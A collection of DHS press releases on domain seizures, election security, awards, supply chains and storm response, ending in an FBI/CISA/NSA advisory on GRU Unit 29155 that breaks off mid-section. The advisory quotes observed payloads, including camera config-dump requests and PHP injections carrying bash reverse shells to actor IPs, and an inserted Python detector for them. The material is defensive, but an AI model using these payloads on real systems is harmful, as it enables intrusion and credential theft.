HSI Seizes Over 350 Website Domains Used to Import Illegal Switches and Silencers From China

Source: US Department of Homeland Security

Importation of these items violates the National Firearms Act, and the illegal use of the “Glock” trademark violates federal laws that prohibit trafficking in counterfeit goods

BOSTON — Homeland Security Investigations (HSI) seized more than 350 internet domains that were allegedly used for the illegal importation of switches and silencers from China.

Switches are parts designed to convert semiautomatic pistols into fully automatic machineguns and silencers are devices used to suppress the sound of a firearm when discharged. Possession of these items and their importation from certain countries, including China, are prohibited under the National Firearms Act.

According to the court documents, in August 2023, HSI New England special agents began targeting multiple websites, businesses and individuals selling, offering for sale, importing and exporting machine gun conversion devices in violation of federal law. It is alleged that HSI special agents engaged in undercover purchases from the website domains promoting the sale of NFA-prohibited items — confirming that the domains were being used to sell illegal switches and silencers. The contraband items were then allegedly shipped from China to government-controlled mailboxes in the United States with false descriptions of their contents — such as “necklace” and “toys” — in an effort to conceal the alleged illegal importation.

“Our office remains committed to protecting our communities from the dangers posed by illegal firearms and firearm accessories, wherever the evidence takes us,” said acting U.S. Attorney Joshua S. Levy. “The seizure of these domains is a critical step in disrupting the flow of dangerous contraband that threatens public safety. Those who attempt to exploit online platforms to traffic in highly lethal firearm parts will be held accountable. We will continue to pursue and dismantle these illicit networks wherever they operate to uphold the integrity of our laws and safeguard our communities.”

“These websites represent a large-scale, organized effort to import illegal switches and silencers that turn ordinary firearms into deadly automatic weapons. HSI has worked diligently with our partners to systematically dismantle this network of websites to uphold our nation’s import laws and to preserve public safety,” said HSI New England Special Agent in Charge Michael J. Krol. “HSI cyber investigations work to keep illegal switches and silencers out of the hands of criminals who use them to commit violence and facilitate crime in our communities.”

“The results of this investigation have, to date, resulted in the seizure of over 700 devices which would convert a firearm into a machine gun, 87 illegal suppressors, 59 handguns, 36 long guns, as well as the seizure of 355 websites which were used to facilitate the trafficking of these items. The proliferation of readily available devices which allow the illegal manufacturing of machine guns is a plague on our communities. The Postal Inspection Service is committed to working with our state and federal partners to identify those who use the Postal Service to traffic these weapons, remove these illicit items from the mail, and increase the safety of our communities and the Postal Service employees who serve them,” said U.S. Postal Inspection Service Inspector in Charge Ketty Larco-Ward, who oversees the agency’s Boston Division.

It is further alleged that many of the website domains trafficked counterfeit goods and unlawfully used the Glock, Inc. trademark by offering purported “Glock” switches for sale. In reality, however, Glock, Inc. has never manufactured switches.

HSI special agents ultimately established probable cause to seize for forfeiture more than 350 domains used in connection with the scheme to import switches and silencers in violation of the NFA and laws prohibiting trafficking in counterfeit goods. Visitors to the websites will now be directed to a landing page indicating that the domain has been seized.

Krol, Levy and Larco-Ward made the announcement Sept. 11. HSI’s investigation was led by HSI New England’s Boston Cyber Crimes group. Valuable assistance in the investigation was provided by U.S. Customs and Border Protection; Bureau of Alcohol, Tobacco, Firearms and Explosives; the Massachusetts State Police and the Massachusetts Attorney General’s Office. Glock, Inc. fully cooperated with the government’s investigation.

HSI is committed to working with its partners to pursue cybercriminals on all fronts. We do this to help maintain internet integrity and protect American consumers, businesses and the public. Persistence, cooperation and ingenuity are keys to combating this global crime. Within HSI, special agents, computer forensics agents and analysts, cyber operations officers, intelligence analysts and cybersecurity specialists work together to investigate cybercrime and develop new techniques to detect, disrupt and deanonymize cybercriminals.

FBI and CISA Release Joint PSA, Just So You Know: False Claims of Hacked Voter Information Likely Intended to Sow Distrust of U.S. Elections

Source: US Department of Homeland Security

WASHINGTON – Today, as part of their public service announcement (PSA) series to put potential election day cyber related disruptions during the 2024 election cycle into context for the American people, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) jointly issued the Just So You Know: False Claims of Hacked Voter Information Likely Intended to Sow Distrust of U.S. Elections PSA to raise awareness of attempts to undermine public confidence in the security of U.S. election infrastructure through the spread of disinformation falsely claiming that cyberattacks compromised U.S. voter registration databases.

As observed through multiple election cycles, foreign actors and cybercriminals continue to spread false information through various platforms to manipulate public opinion, discredit the electoral process, and undermine confidence in U.S. democratic institutions. The FBI and CISA continue to work closely with federal, state, local, and territorial election partners and provide services and information to safeguard U.S. voting processes and maintain the resilience of the U.S. elections.

“This PSA is to educate people that false claims of election infrastructure compromise, like a voter registration database hack, may be spread by foreign actors and to not accept claims of intrusion at face value, as these claims may be meant to influence public opinion and negatively impact the American people’s confidence in our democratic process,” said CISA Senior Advisor Cait Conley.

“The FBI continues to investigate any claims of malicious cyber actors’ attempts to target U.S. elections,” said FBI Cyber Division, Deputy Assistant Director Cynthia Kaiser. “Through our investigations, the FBI has identified that malicious actors commonly attempt to undermine public confidence in US elections by grossly exaggerating about obtaining U.S. voter information. Today’s announcement urges the American public to critically evaluate claims of hacked or leaked voter information and remember that most voter registration information is available to the public. We at the FBI remain committed to continuing to share information to counter false claims and help election officials further secure election processes.” 

###

About CISA 

As the nation’s cyber defense agency and national coordinator for critical infrastructure security, the Cybersecurity and Infrastructure Security Agency leads the national effort to understand, manage, and reduce risk to the digital and physical infrastructure Americans rely on every hour of every day.

Visit CISA.gov for more information and follow us on Twitter, Facebook, LinkedIn, and Instagram.

U.S. Department of Homeland Security Recognizes 158 Employees at Secretary’s Award Ceremony in New York

Source: US Department of Homeland Security

NEW YORK CITY – On September 12, the U.S. Department of Homeland Security (DHS) held an awards ceremony hosted by U.S. Citizenship and Immigration Services (USCIS), where 158 employees received a Secretary’s Award in recognition of their outstanding contributions to the Department’s mission.

“Every single day, with great determination, integrity, and skill, the 268,000 men and women of the Department of Homeland Security ensure the safety and security of the American people,” said Secretary of Homeland Security Alejandro N. Mayorkas. “Thanks to these extraordinary public servants, our shores, harbors, skies, cyberspace, and borders are protected; fentanyl and other deadly drugs are prevented from entering our country; communities are able to recover and rebuild after a natural disaster; the scourges of human trafficking, forced labor, and online exploitation are mitigated; and so much more. The individuals we recognize today with our Department’s highest honor, the Secretary’s Award, reflect the very best of DHS – and in their selfless dedication to mission, the very best of public service.”

The DHS Secretary’s Awards are an annual program that recognizes the extraordinary individual and collective achievements of the workforce. The 158 awardees recognized in today’s ceremony represent USCIS, the Federal Law Enforcement Training Centers (FLETC), Transportation Security Administration (TSA), U.S. Coast Guard (USCG), Immigration and Customs Enforcement (ICE), Cybersecurity and Infrastructure Security Agency (CISA), U.S. Customs and Border Protection (CBP), Federal Emergency Management Agency (FEMA) and the Office of Intelligence and Analysis (I&A).

“In recognizing these outstanding DHS personnel with a Secretary’s Award, we recognize all our talented personnel; the achievements of one are not possible without the contributions of others,” added Secretary Mayorkas. “We also express our appreciation to their families and loved ones; when one serves, the family serves too.”

This year’s award recipients developed and issued policy and procedures associated with a whole-scale transition to a new pay system for TSA; launched a series of coordinated and collaborative initiatives, operations and investigations targeting Transnational Criminal Organizations (TCOs) and national security threats operating and transiting through the Darien Gap region; arrested over 8,000 human smugglers, produced over 5,000 intelligence reports, and seized over $38M USD in real property; ensured over 2,300 vital alerts and warnings were provided to owners and operators of critical infrastructure to protect against cyberattacks; among many other achievements.

This year, DHS is holding nine Secretary’s Awards ceremonies across the country, honoring over 1,700 employees, the most annual awardees ever.

Last year, Secretary Mayorkas unveiled 12 priorities for the Department, including a commitment to champion the workforce and transform the employee experience. DHS has the third largest workforce of any federal department, behind the Department of Defense and Department of Veterans Affairs. The Department is home to more than 92,000 sworn law enforcement officers, the greatest number of law enforcement officers of any department in the federal government. DHS has committed to increasing the representation of women in law enforcement or related occupations at DHS to 30% by 2030. Over 54,000 veterans, or nearly 21% of the workforce, continue serving their country by working at DHS.

DHS operational components interact more frequently on a daily basis with the American public than any other federal department, from travelers moving through air, land, and sea ports of entry, to businesses importing goods into the country, to immigrants applying for services. To learn more about the impact DHS makes every day, visit: DHS.gov/TodayDHSWill.

Last year, DHS improved the efficiency of processing noncitizens at the Southwest Border, deployed across the country to respond to natural disasters, investigated cybercrimes, created a new streamlined process for adjudicating asylum applications, safely and securely resettled nearly 90,000 evacuated Afghans in the United States, provided resources for organizations to enhance their cybersecurity resilience, established a process for Ukrainian nationals seeking refuge, secured the 2022 midterm elections, and demonstrated heroism by acting quickly and courageously to save lives in harrowing circumstances.  

For the full list of awardees, visit 2024 Secretary’s Awards | Homeland Security (dhs.gov).

DHS Establishes United States-United Kingdom-Australia Supply Chain Resilience Cooperation Group (SCRCG) to Tackle Supply Chain Threats

Source: US Department of Homeland Security

Three nations will develop an early warning pilot to assess disruptions to supply chains in the telecommunications sector

WASHINGTON – This week, the U.S. Department of Homeland Security (DHS), the Department for Business and Trade of the United Kingdom of Great Britain and Northern Ireland (U.K.), and Australia’s Department of Industry, Science, and Resources established the United States-United Kingdom-Australia Supply Chain Resilience Cooperation Group to enhance efforts to combat threats to critical supply chains.

The Supply Chain Resilience Cooperation Group will develop an early warning pilot focused on the telecommunications sector. This sector, including satellite and subsea communications, is critical to the shared economic security of the three participating nations. The pilot program will identify and monitor potential disruptions to supply chains in the telecommunications sector. It will also enhance global understanding of the vulnerabilities in the sector and develop communications channels for sharing this information and facilitating cooperative responses to disruptions.

Telecommunications infrastructure is vital to the distribution of public safety information, emergency services, and the day-to-day lives of many citizens. For example, undersea fiber-optic cables carry over 95% of transoceanic data traffic, without which smartphones, financial networks, and communications systems would cease to function reliably.

“The resilience of our critical supply chains is a homeland security and economic security imperative,” said Secretary of Homeland Security Alejandro N. Mayorkas. “Collaboration with international partners allows us to anticipate and mitigate disruptions before they occur. Our new U.S.-U.K.-Australia Supply Chain Resilience Cooperation Group will help ensure that our communities continue to have the essential goods and services they need, when they need them.”

The U.K. and Australia are the first countries to formalize cooperation with DHS’ Supply Chain Resilience Center through a Memorandum of Understanding. Established in 2023, the Supply Chain Resilience Center works to analyze supply chain vulnerabilities alongside federal partners and private sector stakeholders to mitigate potential disruptions, ensuring the delivery of essential goods and services to American citizens.

The U.K.’s Economic Security and Supply Chain Resilience Directorate, housed in the Department for Business and Trade, oversees efforts to mitigate supply-side risks to the U.K. economy and support greater long-term resilience. Australia’s Office of Supply Chain Resilience, housed in the Department for Industry, Science, and Resources, focuses on mitigating supply chain vulnerabilities and ensuring ongoing access to essential goods and services. These offices participating in the Memorandum of Understanding are not direct DHS counterparts, but their mission areas include significant overlap with respect to supply chain resilience issues. This partnership reflects the multifaceted nature of supply chain challenges and draws on the wide-ranging expertise represented between the three participants.

“The United States has recently felt effects of supply chain disruptions around the world, which is why working with our allies to secure our supply chains is more critical than ever,” said Under Secretary for Policy Robert Silvers. “By establishing the U.S.- U.K.-Australia Supply Chain Resilience Cooperation Group and developing our early warning system, we are setting the groundwork to anticipate supply chain disruptions and build resilience before our nations are affected by shortages of critical goods.”

“Strong supply chains are essential for our economic security, and we cannot rely purely on the invisible hand of the market to deliver them,” said U.K. Minister for Trade Policy and Economic Security Douglas Alexander. “Improved cooperation between our three nations will help us to identify and mitigate disruption to supply chains and better support U.K. businesses trading internationally.”

The Supply Chain Resilience Center, established in November 2023, serves as a hub for key U.S. government and industry partners to come together to anticipate, analyze, and plan for potential supply chain disruptions. It is supported by personnel from DHS Headquarters, Federal Emergency Management Agency (FEMA), U.S. Coast Guard (USCG), U.S. Customs and Border Protection (CBP), Immigration and Customs Enforcement (ICE), Homeland Security Investigations (HSI), Transportation Security Administration (TSA), and Cybersecurity and Infrastructure Security Agency (CISA) who bring extensive supply chain knowledge and expertise, and who are in regular contact with industry and other stakeholders.

DHS Statement on Safety and Enforcement During Tropical Storm Francine

Source: US Department of Homeland Security

During emergency events, the Department of Homeland Security (DHS) works with its federal, state, local, and non-governmental partners to support the needs of the people in the areas that may be impacted.

In such circumstances, U.S. Immigration and Customs Enforcement (ICE) and U.S. Customs and Border Protection (CBP) remind the public that sites that provide emergency response and relief are considered protected areas. To the fullest extent possible, ICE and CBP do not conduct immigration enforcement activities at protected areas such as along evacuation routes, sites used for sheltering or the distribution of emergency supplies, food or water, or registration sites for disaster-related assistance or the reunification of families and loved ones.

At the request of FEMA or local and state authorities, ICE and CBP may help conduct search and rescue, air traffic de-confliction and public safety missions. ICE and CBP provide emergency assistance to individuals regardless of their immigration status. DHS officials do not and will not pose as individuals providing emergency-related information as part of any enforcement activities.

DHS is committed to ensuring that every individual who seeks shelter, aid, or other assistance as a result of a natural disaster or emergency event is able to do so regardless of their immigration status.

DHS carries out its mission without discrimination on the basis of race, religion, gender, sexual orientation or gender identity, ethnicity, disability or political associations, and in compliance with law and policy.

For information about filing a complaint with the DHS Office for Civil Rights and Civil Liberties about these matters, please visit our Make a Civil Rights Complaint page.

CISA Releases Election Security Focused Checklists for Both Cybersecurity and Physical Security

Source: US Department of Homeland Security

WASHINGTON – Today, the Cybersecurity and Infrastructure Security Agency (CISA) released two election security checklists as part of the comprehensive suite of resources available for election officials: the Physical Security Checklist for Election Offices and the Election Infrastructure Cybersecurity Readiness and Resilience Checklist. These checklists are tools to quickly review existing practices and take steps to enhance physical and cyber resilience in preparation for election day.

“Election officials around the country are unwavering in their commitment to enhance the cyber and physical security of election infrastructure to meet an evolving threat environment. As election officials and their teams enter into final preparations for November, these checklists help highlight some of the most common threat vectors, security practices, and resilience measures for consideration,” said CISA Senior Advisor Cait Conley.

These checklists provide a series of questions to guide preparation for potential cyber and physical security incidents that may impact election infrastructure. They help election officials identify areas to potentially enhance physical security, operational resilience, and cybersecurity at election infrastructure facilities and take action to implement low- or no-cost options in the short term.

For more information, see #Protect2024 for the latest information regarding election security.

###

About CISA 

As the nation’s cyber defense agency and national coordinator for critical infrastructure security, the Cybersecurity and Infrastructure Security Agency leads the national effort to understand, manage, and reduce risk to the digital and physical infrastructure Americans rely on every hour of every day.

Visit CISA.gov for more information and follow us on Twitter, Facebook, LinkedIn, and Instagram.

Russian Military Cyber Actors Target US and Global Critical Infrastructure

Source: US Department of Homeland Security

Summary

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155) are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13, 2022. These cyber actors are separate from other known and more established GRU-affiliated cyber groups, such as Unit 26165 and Unit 74455.

To mitigate this malicious cyber activity, organizations should take the following actions today:

  • Prioritize routine system updates and remediate known exploited vulnerabilities.
  • Segment networks to prevent the spread of malicious activity.
  • Enable phishing-resistant multifactor authentication (MFA) for all externally facing account services, especially for webmail, virtual private networks (VPNs), and accounts that access critical systems.

This Cybersecurity Advisory provides tactics, techniques, and procedures (TTPs) associated with Unit 29155 cyber actors, both during and after their deployment of WhisperGate against Ukraine, as well as further analysis (see Appendix A) of the WhisperGate malware initially published in the joint advisory Destructive Malware Targeting Organizations in Ukraine, published February 26, 2022.

FBI, CISA, NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020:

  • U.S. Department of the Treasury
  • U.S. Department of State (Rewards for Justice)
  • U.S. Cyber Command Cyber National Mission Force (CNMF)
  • Netherlands Defence Intelligence and Security Service (MIVD)
  • Czech Military Intelligence (VZ)
  • Czech Republic Security Information Service (BIS)
  • German Federal Office for the Protection of the Constitution (BfV)
  • Estonian Internal Security Service (KAPO)
  • Latvian State Security Service (VDD)
  • Security Service of Ukraine (SBU)
  • Computer Emergency Response Team of Ukraine (CERT-UA)
  • Canadian Security Intelligence Service (CSIS)
  • Communications Security Establishment Canada (CSE)
  • Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)
  • United Kingdom National Cyber Security Centre (NCSC-UK)

For additional information on Russian state-sponsored malicious cyber activity and related indictments, see the U.S. Department of Justice (DOJ) press release, FBI’s Cyber Crime webpage, and CISA’s Russia Cyber Threat Overview and Advisories webpage.

For a downloadable copy of indicators of compromise (IOCs):

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

GRU Unit 29155: Cyber Component

FBI, NSA, and CISA assess Unit 29155 is responsible for attempted coups, sabotage and influence operations, and assassination attempts throughout Europe. Unit 29155 expanded their tradecraft to include offensive cyber operations since at least 2020. Unit 29155 cyber actors’ objectives appear to include the collection of information for espionage purposes, reputational harm caused by the theft and leakage of sensitive information, and systematic sabotage caused by the destruction of data [T1485].

FBI assesses the Unit 29155 cyber actors to be junior active-duty GRU officers under the direction of experienced Unit 29155 leadership. These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions. Additionally, FBI assesses Unit 29155 cyber actors rely on non-GRU actors, including known cyber-criminals and enablers to conduct their operations.

Cybersecurity Industry Tracking

The cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to Unit 29155 cyber actors. While not all encompassing, the following are the most notable threat group names related under MITRE ATT&CK G1003 and commonly used within the cybersecurity community.

  • Cadet Blizzard (formerly known as DEV-0586 by Microsoft)[1],[2]
  • Ember Bear (also known as Bleeding Bear by CrowdStrike)[3]
  • Frozenvista
  • UNC2589[4]
  • UAC-0056[5]

Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. Government’s understanding for all activity related to these groupings.

Victimization

In addition to WhisperGate and other incidents against Ukraine, Unit 29155 cyber actors have conducted computer network operations against numerous members of the North Atlantic Treaty Organization (NATO) in Europe and North America, as well as countries in Europe, Latin America, and Central Asia. The activity includes cyber campaigns such as website defacements, infrastructure scanning, data exfiltration, and data leak operations. These actors sell or publicly release exfiltrated victim data obtained from their compromises. Since early 2022, the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to Ukraine.

To date, the FBI has observed more than 14,000 instances of domain scanning across at least 26 NATO members and several additional European Union (EU) countries. Unit 29155 cyber actors have defaced victim websites and used public website domains to post exfiltrated victim information.

Whether through offensive operations or scanning activity, Unit 29155 cyber actors are known to target critical infrastructure and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of NATO members, the EU, Central American, and Asian countries.

TTP Overview

Reconnaissance

Unit 29155 cyber actors have been observed targeting IP ranges [T1595.001] used within multiple government and critical infrastructure organizations. The following are publicly available tools these cyber actors have used for scanning [T1595] and vulnerability exploit efforts. Unit 29155 cyber actors were not observed using these tools outside of their intended purpose. Note: Use of these tools should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

  • Acunetix: Unit 29155 cyber actors leveraged both Acunetix and Nmap to identify open ports, services, and vulnerabilities for networks [T1595.002].[6]
  • Amass: Unit 29155 cyber actors leveraged both Amass and VirusTotal to obtain subdomains for target websites [T1590.002].[7]
  • Droopescan[8]
  • JoomScan[9]
  • MASSCAN: Unit 29155 cyber actors used MASSCAN and Nmap to discover other machines once inside victim networks.[10]
  • Netcat[11]
  • Nmap: Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the Nmap Scripting Engine [NSE]) to write custom scripts for discovering and scanning other machines [T1046].
  • Shodan: Unit 29155 cyber actors used Shodan to identify hosts with a specific set of vulnerabilities or device types [T1596.005].[12]
  • VirusTotal[13]
  • WPScan

Additionally, Unit 29155 cyber actors have used infrastructure configured with OpenVPN [T1572] over port 1194, in some instances to perform Active Directory (AD) enumeration. Adminer, in combination with Impacket and ldapdomaindump, were the tools used for gathering information on AD. Once active devices are found, Unit 29155 cyber actors look for vulnerabilities to exploit. For example, the Acunetix vulnerability scanning tool has been used for gathering information on potential vulnerabilities such as blind cross-site scripting, as shown in the following requests observed in web server logs:

GET /index.php?log=to@example.com>%0d%0abcc:009247.3183-377.3183.1bf6c.19446.2@bxss.me

"GET /CMS/files/log.htm HTTP/1.1" * * "(nslookup hitccruvbrumn76c1b.bxss.me||perl -e "gethostbyname('hitccruvbrumn76c1b.bxss.me')")"

As the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or machines, they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure [T1588.005]. Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for, but not exploiting, the following CVEs:

Analysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access [T1190], as detailed throughout this advisory:

Resource Development

Rather than build custom solutions, Unit 29155 cyber actors use common red teaming techniques and publicly available tools to conduct cyber operations. As a result, many TTPs overlap with those of other cyber actors, which can lead to misattribution.

Unit 29155 actors and their cyber-criminal affiliates commonly maintain accounts on dark web forums; this has provided the opportunity to obtain various hacker tools such as malware and malware loaders [T1588.001] like Raspberry Robin and SaintBot. While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine, the use of WhisperGate is not unique to the group. Technical analysis can be found in Appendix A: WhisperGate Malware Analysis.

Initial Access

Unit 29155 cyber actors are known to use VPNs to anonymize their operational activity. These cyber actors commonly attempt to exploit weaknesses in internet-facing systems, like the CVEs listed above, to initially access networks. In one instance, Unit 29155 cyber actors exploited CVE-2021-33044 and CVE-2021-33045 on Dahua IP cameras to bypass identity authentication.

Lateral Movement

Unit 29155 cyber actors have used Shodan to scan for Internet of Things (IoT) devices, using exploitation scripts to authenticate to IP cameras with default usernames and passwords [T1078.001], and exfiltrating images [T1125] (JPG files). Attempts are then made to perform remote command execution via web to vulnerable IP cameras; if successful, cyber actors would dump configuration settings and credentials in plaintext (as shown in Table 1 below) [T1552.001].

Appendix B: Indicators of Compromise lists threat actor IP addresses associated with the activity detailed in this section.

Note: These events are independent and not correlated as a single timeline of compromise.

Table 1 (Event / Victim Observation)

Event: Web requests observed from victim infrastructure
Victim Observation: These requests are likely intended to dump configuration settings and credentials [T1003]:

hxxp://:/PictureCatch.cgi?username=&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED

hxxp://:/ssi.cgi/tmp/Login.htm

Event: POST requests sent to victims with payloads [T1071.001]
Victim Observation:

"txtUser=lol&txtPassword=2&btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties&chRemember=on&txtPassword=g00dPa%24%24w0rD&txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F179.43.175.38%2F6870%200%3E%261%22))%7d"

"txtUser=lol&txtPassword=2&btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties&chRemember=on&txtPassword=g00dPa%24%24w0rD&txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F81.17.24.130%2F6870%200%3E%261%22))%7d"

Event: URL-encoded values from txtUser for both commands, decoded to the embedded bash commands
Victim Observation:

${@print(system("bash -i >& /dev/tcp/179.43.175.38/6870 0>&1"))}

${@print(system("bash -i >& /dev/tcp/81.17.24.130/6870 0>&1"))}
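The requests in Table 1 can be caught at the web tier by decoding each form field and matching the patterns they carry. The following Python routine is an added example (not part of the advisory): it URL-decodes query strings or POST bodies, inspects every value including repeated keys such as the second txtUser, and flags PHP expression injection, bash reverse shells to /dev/tcp, and server-side-include injection; the detection rules are hypothetical and the sample requests are constructed with TEST-NET addresses.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, unquote_plus

# Hypothetical detection rules modelled on the Table 1 requests (not CISA signatures).
INDICATORS = {
    # PHP expression-style injection such as ${@print(...)}
    "php_expression_injection": re.compile(r"\$\{\s*@?\s*\w+\s*\("),
    # direct command execution calls inside a submitted value
    "shell_exec_call": re.compile(r"\b(?:system|exec|passthru|shell_exec|popen)\s*\("),
    # bash reverse shell to /dev/tcp/<ip>/<port>; captures the callback address
    "bash_reverse_shell": re.compile(
        r"bash\s+-i\s*>&\s*/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})"),
    # server-side include injection used to read a camera's config file
    "ssi_include_injection": re.compile(r"<!--#include\s+(?:file|virtual)=", re.IGNORECASE),
}


def decode_layers(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly until stable, so double-encoded payloads are still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_request(query_or_body: str) -> Dict[str, object]:
    """Return indicator hits per form field plus any reverse-shell callback addresses."""
    # parse_qs decodes once and keeps every value of a repeated key (e.g. two txtUser=).
    fields = parse_qs(query_or_body, keep_blank_values=True)
    hits: List[Tuple[str, str]] = []
    callbacks: List[Tuple[str, int]] = []
    for name, values in fields.items():
        for value in values:
            text = decode_layers(value)
            for label, rx in INDICATORS.items():
                match = rx.search(text)
                if not match:
                    continue
                hits.append((name, label))
                if label == "bash_reverse_shell":
                    callbacks.append((match.group(1), int(match.group(2))))
    return {"suspicious": bool(hits), "hits": sorted(set(hits)), "callbacks": callbacks}


# Constructed samples in the shape of Table 1 (TEST-NET address instead of actor IPs).
SAMPLE_POST_BODY = (
    "txtUser=lol&txtPassword=2&btConnect=Piesl%C4%93gties&chRemember=on"
    "&txtPassword=g00dPa%24%24w0rD"
    "&txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.0.2.10%2F6870%200%3E%261%22))%7d"
)
SAMPLE_CAMERA_QUERY = (
    "username=&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b"
    "&data_type=1&attachment=1&channel=1&secret=1&key=PWNED"
)
SAMPLE_BENIGN_LOGIN = "txtUser=alice&txtPassword=s3cret&btConnect=Piesl%C4%93gties&chRemember=on"

if __name__ == "__main__":
    for sample in (SAMPLE_POST_BODY, SAMPLE_CAMERA_QUERY, SAMPLE_BENIGN_LOGIN):
        print(analyse_request(sample))
```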

In addition, incident analysis identified the general observations listed below on victim infrastructure. Each event should be considered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and timeframes. Appendix B: Indicators of Compromise lists IOCs associated with the observations in Table 1 and below.

  • In one instance shortly following a deployment of WhisperGate malware, Unit 29155 cyber actors exfiltrated data to mega[.]nz using Rclone [T1567.002].
  • Unit 29155 cyber actors used Pass-the-Hash [T1550.002] via ProxyChains.
  • Cyber actors performed SSH and SSHPass executions.
  • Cyber actors initiated a web request and executed commands via ProxyChains. This included obtaining NT hashes via Server Message Block (SMB) using smbclient, executing Windows Management Instrumentation (WMI) with hashes, and making web requests with resources i.php and tunnel.jsp. In one instance, cyber actors used smbclient via ProxyChains to access internal network shares, and subsequently PSQL and MySQL clients to access internal databases.
  • Cyber actors used Impacket for post-exploitation and lateral movement. The script secretsdump.py was used from the Impacket framework to obtain domain credentials, while psexec.py was subsequently used to move laterally within a victim network. 
  • Cyber actors used ntlmrelayx.py via Impacket and krbrelayx.py, which requires Impacket to function.
  • Cyber actors used Responder.py.
  • Cyber actors used su-bruteforce to brute force a selected user using the su command.
  • Cyber actors used BloodHound, an open source AD reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.
  • Cyber actors used CrackMapExec via ProxyChains with SMB protocol targeting internal victim IP addresses. This open source post-exploitation tool automates assessing the security of large AD networks.
  • Cyber actors used LinPEAS, an open source script designed to automate the process of searching for potential privilege escalation vulnerabilities on a Linux victim.
  • Cyber actors used GO Simple Tunnel (GOST) (MD5: 896e0f54fc67d72d94b40d7885f10c51) for 30 days within one incident and against additional victims on various occasions. GOST is a tunneling tool designed to establish secure connections between clients and servers, allowing for secure data transmission over untrusted networks.
  • Cyber actors used Through the Wire against a victim’s internet-facing Confluence server. Through the Wire is a proof of concept[14] exploit for CVE-2022-26134, an OGNL injection vulnerability allowing an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. All versions of Confluence Server and Data Center prior to the fixed versions listed by Atlassian are affected by this vulnerability.[15] A reverse shell over HTTPS was used to communicate with a listening host on port 8081.
  • Cyber actors initiated Nmap scans on local web servers.
  • Cyber actors performed lateral movement from compromised web servers to exploit a corporate Microsoft Windows network, commonly using psexec.py from the Impacket framework. The script secretsdump.py from the Impacket framework was used to obtain domain credentials.
  • Cyber actors may have used Raspberry Robin malware in the role of an access broker [T1588.001].
  • Cyber actors targeted victims’ Microsoft Outlook Web Access (OWA) infrastructure with password spraying to obtain valid usernames and passwords [T1110.003].

Command and Control

Infrastructure

Since at least 2020, Unit 29155 cyber actors have used virtual private servers (VPSs) [T1583.003] to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. Use of VPSs is common because the associated IP addresses do not reveal the actors’ true country of origin.

Post-Exploitation

When an exploit is successfully executed on a victim system, the actors can then launch a Meterpreter payload [T1105], which commonly uses a reverse Transmission Control Protocol (TCP) connection to initiate communication with the threat actors’ infrastructure [T1095]. In one instance, an established reverse TCP session was observed from victim to actor infrastructure via the following ports:

  • 1234
  • 1851
  • 43221
  • 443
  • 4444
  • 4688
  • 5432
  • 8080
  • 8081
  • 8082
  • 8084
  • 8085
  • 8088
  • 8089
  • 8090
  • 8443
  • 8487
  • 8888

Additional observations were collected from victim engagement and analysis, including:

  • Use of the Metasploit Framework to search for and/or access modules such as mysql, postgres, and ssh software and features.
  • Use of Meterpreter and Netcat to execute reverse shells over ports such as 8081.
  • Use of Impacket.
  • Use of PHP web shells (exp_door v1.0.2, b374k, WSO 4.0.5) and the P.A.S. web shell [T1505.003], likely for initial access.
  • Use of EternalBlue.[16],[17]
  • Use of reGeorg or Neo-reGeorg to set up a proxy to tunnel network traffic following compromise of a victim website, as well as use of ProxyChains to run Nmap within the network.

Encrypted Communication

Once Unit 29155 cyber actors gain access to a victim’s internal network, the following has been observed on victim infrastructure:

  1. Using Domain Name System (DNS) tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic [T1071.004]. For example, Iodine was used to tunnel data via dns.test658324901domain.me.
